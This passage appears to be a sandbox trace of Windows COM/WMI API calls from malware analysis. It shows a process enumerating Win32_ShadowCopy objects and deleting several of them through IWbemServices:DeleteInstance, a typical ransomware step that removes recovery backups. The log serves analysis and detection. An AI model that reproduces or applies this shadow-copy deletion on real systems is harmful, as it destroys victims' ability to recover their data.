lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0142.280] SysStringLen (param_1="root\\cimv2") returned 0xa [0142.280] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0142.280] SysStringLen (param_1="root\\cimv2") returned 0xa [0142.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0142.280] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0142.280] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0142.280] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0142.281] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0142.281] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0142.281] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0142.281] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53490, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0142.281] WbemDefPath:IWbemPath:GetText (in: This=0x1be53490, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0142.282] WbemDefPath:IWbemPath:GetText (in: This=0x1be53490, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0142.282] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0142.282] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0142.282] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0142.282] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0142.282] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0142.282] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0142.283] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0142.283] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0142.283] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0142.284] WbemDefPath:IWbemPath:GetText (in: This=0x1be53490, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0142.284] WbemDefPath:IWbemPath:GetText (in: This=0x1be53490, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0142.284] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0143.331] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0143.331] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be60480, puReturned=0x1c90de18*=0x1) returned 0x0 [0143.332] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be60480) returned 0x0 [0143.332] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0143.333] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0143.333] IUnknown:AddRef (This=0x1be60480) returned 0x3 [0143.333] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0143.333] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be60488) returned 0x0 [0143.333] IMarshal:GetUnmarshalClass (in: This=0x1be60488, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0143.333] IUnknown:Release (This=0x1be60488) returned 0x3 [0143.333] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0143.333] IUnknown:AddRef (This=0x1be60480) returned 0x4 [0143.333] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0143.333] IUnknown:Release (This=0x1be60480) returned 0x3 [0143.333] IUnknown:Release (This=0x1be60480) returned 0x2 [0143.334] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0143.334] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0143.334] IUnknown:AddRef (This=0x1be60480) returned 0x3 [0143.334] IUnknown:QueryInterface (in: This=0x1be60480, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be60480) returned 0x0 [0143.334] IUnknown:Release (This=0x1be60480) returned 0x3 [0143.334] IUnknown:Release (This=0x1be60480) returned 0x2 [0143.334] IUnknown:Release (This=0x1be60480) returned 0x1 [0143.334] CoTaskMemFree (pv=0x16a900) [0143.334] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0143.334] IUnknown:AddRef (This=0x1be60480) returned 0x2 [0143.334] IWbemClassObject:Get (in: This=0x1be60480, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0143.335] IWbemClassObject:Get (in: This=0x1be60480, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0143.335] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x53 [0143.335] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0143.335] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0143.335] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0143.335] IUnknown:Release (This=0x142498) returned 0x1 [0143.335] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a490) returned 0x0 [0143.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a490, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0143.336] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a490, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53550) returned 0x0 [0143.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53550) returned 0x0 [0143.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0143.336] WbemDefPath:IUnknown:AddRef (This=0x1be53550) returned 0x3 [0143.336] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0143.337] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9375e0) returned 0x0 [0143.337] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9375e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0143.337] WbemDefPath:IUnknown:Release (This=0x1b9375e0) returned 0x3 [0143.337] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0143.337] WbemDefPath:IUnknown:AddRef (This=0x1be53550) returned 0x4 [0143.337] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0143.337] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x3 [0143.337] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x2 [0143.337] WbemDefPath:IUnknown:Release (This=0x1be5a490) returned 0x0 [0143.337] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x1 [0143.338] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0143.338] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0143.338] WbemDefPath:IUnknown:AddRef (This=0x1be53550) returned 0x2 [0143.338] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53550) returned 0x0 [0143.338] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x2 [0143.338] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x1 [0143.338] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0143.338] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0143.338] WbemDefPath:IUnknown:AddRef (This=0x1be53550) returned 0x2 [0143.338] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53550, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53550) returned 0x0 [0143.338] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x2 [0143.338] WbemDefPath:IUnknown:AddRef (This=0x1be53550) returned 0x3 [0143.339] WbemDefPath:IWbemPath:SetText (This=0x1be53550, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0143.339] WbemDefPath:IUnknown:Release (This=0x1be53550) returned 0x2 [0143.339] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0143.339] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0143.339] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0143.339] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0143.339] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0143.339] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0143.339] IWbemClassObject:Get (in: This=0x1be60480, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0143.339] SysStringLen (param_1="root\\cimv2") returned 0xa [0143.339] IWbemClassObject:Get (in: This=0x1be60480, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0143.339] SysStringLen (param_1="root\\cimv2") returned 0xa [0143.339] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0143.340] IWbemClassObject:Get (in: This=0x1be60480, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0143.340] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0143.340] IWbemClassObject:Get (in: This=0x1be60480, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0143.340] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0143.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be53550, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be53550, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be53550, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0143.340] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0143.340] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0143.340] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0143.341] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0143.341] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0143.341] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0143.341] IWbemClassObject:Get (in: This=0x1be60480, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0143.341] WbemDefPath:IWbemPath:GetText (in: This=0x1be53550, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0143.341] WbemDefPath:IWbemPath:GetText (in: This=0x1be53550, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"") returned 0x0 [0143.341] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{5555A914-627B-4AF5-A342-EC1A6421363A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0144.753] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0144.753] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be60730, puReturned=0x1c90de18*=0x1) returned 0x0 [0144.754] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be60730) returned 0x0 [0144.754] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0144.754] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0144.754] IUnknown:AddRef (This=0x1be60730) returned 0x3 [0144.754] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0144.754] IUnknown:QueryInterface (in: This=0x1be60730, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be60738) returned 0x0 [0144.755] IMarshal:GetUnmarshalClass (in: This=0x1be60738, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 